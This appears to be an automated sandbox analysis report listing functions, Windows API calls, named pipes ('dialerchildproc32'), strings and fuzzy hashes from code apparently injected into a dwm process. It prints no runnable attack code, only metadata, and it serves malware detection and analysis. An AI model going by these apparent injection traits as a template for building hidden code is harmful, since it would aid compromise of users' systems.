                                                                          control_flow_graph 417 1160ca66910-1160ca66916 418 1160ca66918-1160ca6691b 417->418 419 1160ca66951-1160ca6695b 417->419 421 1160ca6691d-1160ca66920 418->421 422 1160ca66945-1160ca66984 call 1160ca66fc0 418->422 420 1160ca66a78-1160ca66a8d 419->420 426 1160ca66a9c-1160ca66ab6 call 1160ca66e54 420->426 427 1160ca66a8f 420->427 424 1160ca66938 __scrt_dllmain_crt_thread_attach 421->424 425 1160ca66922-1160ca66925 421->425 437 1160ca6698a-1160ca6699f call 1160ca66e54 422->437 438 1160ca66a52 422->438 433 1160ca6693d-1160ca66944 424->433 429 1160ca66927-1160ca66930 425->429 430 1160ca66931-1160ca66936 call 1160ca66f04 425->430 440 1160ca66ab8-1160ca66aed call 1160ca66f7c call 1160ca66e1c call 1160ca67318 call 1160ca67130 call 1160ca67154 call 1160ca66fac 426->440 441 1160ca66aef-1160ca66b20 call 1160ca67190 426->441 431 1160ca66a91-1160ca66a9b 427->431 430->433 450 1160ca66a6a-1160ca66a77 call 1160ca67190 437->450 451 1160ca669a5-1160ca669b6 call 1160ca66ec4 437->451 442 1160ca66a54-1160ca66a69 438->442 440->431 452 1160ca66b22-1160ca66b28 441->452 453 1160ca66b31-1160ca66b37 441->453 450->420 470 1160ca669b8-1160ca669dc call 1160ca672dc call 1160ca66e0c call 1160ca66e38 call 1160ca6ac0c 451->470 471 1160ca66a07-1160ca66a11 call 1160ca67130 451->471 452->453 459 1160ca66b2a-1160ca66b2c 452->459 454 1160ca66b39-1160ca66b43 453->454 455 1160ca66b7e-1160ca66b94 call 1160ca6268c 453->455 461 1160ca66b45-1160ca66b4d 454->461 462 1160ca66b4f-1160ca66b5d call 1160ca75780 454->462 478 1160ca66bcc-1160ca66bce 455->478 479 1160ca66b96-1160ca66b98 455->479 460 1160ca66c1f-1160ca66c2c 459->460 467 1160ca66b63-1160ca66b78 call 1160ca66910 461->467 462->467 482 1160ca66c15-1160ca66c1d 462->482 467->455 467->482 470->471 520 1160ca669de-1160ca669e5 __scrt_dllmain_after_initialize_c 470->520 471->438 490 1160ca66a13-1160ca66a1f call 1160ca67180 471->490 480 1160ca66bd5-1160ca66bea call 1160ca66910 478->480 481 1160ca66bd0-1160ca66bd3 478->481 479->478 487 1160ca66b9a-1160ca66bbc call 1160ca6268c call 1160ca66a78 479->487 480->482 500 1160ca66bec-1160ca66bf6 480->500 481->480 481->482 482->460 487->478 512 1160ca66bbe-1160ca66bc6 call 1160ca75780 487->512 509 1160ca66a45-1160ca66a50 490->509 510 1160ca66a21-1160ca66a2b call 1160ca67098 490->510 506 1160ca66bf8-1160ca66bff 500->506 507 1160ca66c01-1160ca66c11 call 1160ca75780 500->507 506->482 507->482 509->442 510->509 519 1160ca66a2d-1160ca66a3b 510->519 512->478 519->509 520->471 521 1160ca669e7-1160ca66a04 call 1160ca6abc8 520->521 521->471
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: a3fe409731fb70234742a26c748ae4f8614f4a10b95ebe228a936564dbb7576c
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 2981DC31710B458AFB5CAB6D98413D963A0EB9DB84F5485A5BF098379EDB3BC8C98700
                                                                          Function 000001160CA9CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001160CA9CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001160CA9CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001160CA9ECCC,?,?,?,?,000001160CA9BF9F,?,?,?,?,?,000001160CA97AB0), ref: 000001160CA9CF2C
                                                                            • Part of subcall function 000001160CA9D6CC: HeapAlloc.KERNEL32 ref: 000001160CA9D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF54
                                                                            • Part of subcall function 000001160CA9D744: HeapFree.KERNEL32 ref: 000001160CA9D75A
                                                                            • Part of subcall function 000001160CA9D744: GetLastError.KERNEL32 ref: 000001160CA9D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: e3b464467abdfc7ef8d6bea1e9688bc0b2781f6fd73f9701bdfe4f8e4c242dd3
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: D2414F30201B8446FA6CA77559573F92292DB8C7B8F6807A4BF37466EFDE2B94C19600
                                                                          Function 000001160CA92244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: e292498a95fe2d6169a81c521cacf55811437730a08cb21fdc389e806cb806c0
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: A4213876614B4092FB188B26E4483DA67A0F789BA4F544255FF9903BA8CF7EC189CF00
                                                                          Function 000001160CA69944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 2ba54f05254bae68ad0188527a48383a5b7b71df85ea8c7c10141abdec57d0dc
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 61E16872604B848AEB689F79D4803DE77A4F799B98F100155FF8957B9ACB3AC4D1C700
                                                                          Function 000001160CA9A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 14005bb12589e4233e0fab4aea04c1dde444902fadaf24d390ce92b9d7b9fed6
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: E9E17B72604B808AEB68DF65D4823DE77A4F789B98F10415AFF8957B99CB36C8C1D700
                                                                          Function 000001160CA9F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 6d612d87b4898bdc89ac83feab02f6d21f42468f4b4b05212a1517f44b61b3e5
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: F141A132311B1095EA1ACB96AC057DA2391F78DBE4F194169BF1A8B78DEF3BC4C58304
                                                                          Function 000001160CA9104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 55615972326a040fe958770e01c28fbe459630cefd03aa3737035648c05c42c9
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 1B412772214B849AE764CF21E4457DEB7A1F388B98F548129EF8907B5CDF3AC589CB40
                                                                          Function 000001160CA9D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 82fc957d5346222e1d733658fed4bc6a6dfa0a37baf299815241692ebbc59f18
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 80115E31B0438441FA6CA76699533F96191DB4C7F4F6843A4BF3A476EEDE2BC4C28200
                                                                          Function 000001160CA97510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 540267570425d117f090ef837b9397d276ab399d3c722144de76e861c80034be
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7681B33162034586FB5CAB2994533E966D0E78D780F1884A5FF05C77AEEB3BC8C58760
                                                                          Function 000001160CA99DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: abd6868f5bfbe0cdca063c48252deb3187f6717ad07a76f5073b55de43ee900f
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: FA31A531312B40E1EE19DB52A4017D622A4F74CBA0F594569BF2E4B798EF3BC4C58710
                                                                          Function 000001160CAA3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 194822f1954037b5d9a6c61264fd086dd7fbb3fa8fd752f0d2df09d7710aee99
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 42115E31310B8486E7548B52E85439966A0F7CCFE4F084265FF6A877A9CB79C8948740
                                                                          Function 000001160CA92F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: 8d930a18327bd9a43db0732196638a892477d7c75c33e7a73febb97ecd77854c
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 6531BE32701B5592EA18DF16E5417EAA7A0FB8CB80F084164BF4947B69EF3BC4E1C700
                                                                          Function 000001160CA9CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: f3929fcf0600c5a1ca1a21302142746d93eb7e4b9b979ca0762c13e2c0d35c91
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: 44115C3060078441FA6CA76659563ED6242EB8C7B4F1447A4BF36476DEDE2B84C19600
                                                                          Function 000001160CA9199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: af01c00919951e4fbbd7663ca6f7e098beb117bb7106cd0c2b33be6e098df128
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 18011B31300B4582EA58DB52A4987D9A7A5F78CBC4F484075EF5943B59DF3EC989CB40
                                                                          Function 000001160CA936C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 1e9d5fc236bac10df63775cbcddacc04a63121178a321233b282703aa10e5bdd
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: B9012175612B4486EF689B12E8093D663B0FB8DB86F084565EF5907769EF3FC1848B00
                                                                          Function 000001160CA98FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: 35d689d22f090c3dde1fad3251640d982615881078171429b9f1c48e062cb2a4
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: B4518F32601700A6EB98DB25E849BDA77A5F348B88F6485A8FF5A4774CDB77C981C700
                                                                          Function 000001160CA91A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: b58e77a80eaaa95910238168c7a419b7113e6963dbcbf8b67ec3c52b926b8937
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 37F03C7270474592EB648B21E8847D9A761F79CB88F888064EF4946958DB6ECACDCB00
                                                                          Function 000001160CA93044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: dde38f65cca395521febae0b5df3043054826c15fd09759d878c00cf1238a4cd
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: 54F0F874614B8492EA588B63B9141D9A661EB8CFD0F4891A0FF5A47B2CDF6AC4868B10
                                                                          Function 000001160CA9BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 625c34ad1d7cf0a05bbf71c611f06e69492c84afc3cb2e125c054c7af4b1497c
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 92F06271311B0482EB288B25F4453EA6320EBCDB65F580299FF6A451F8CF2FC4C98750
                                                                          Function 000001160CA95710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                          • Instruction ID: fdf1e7fe464b55f4c89c1eb8caaf6106e02504877a2f508e39f4bbd05f754d10
                                                                          • Opcode Fuzzy Hash: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                          • Instruction Fuzzy Hash: DB61E536919B44C6E769CB15E45639AB7A0F388784F104259FF8E87BA8DB7EC590CF00
                                                                          Function 000001160CA73504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 1f383b02d939094608eb33960f8cf0d760969291277e52a0ff1aeef425a1149e
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 0911A333A52B1119FE6C1528EC513F912917B5C374F4B87B8BF66062FECA66C8C57200
                                                                          Function 000001160CAA4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
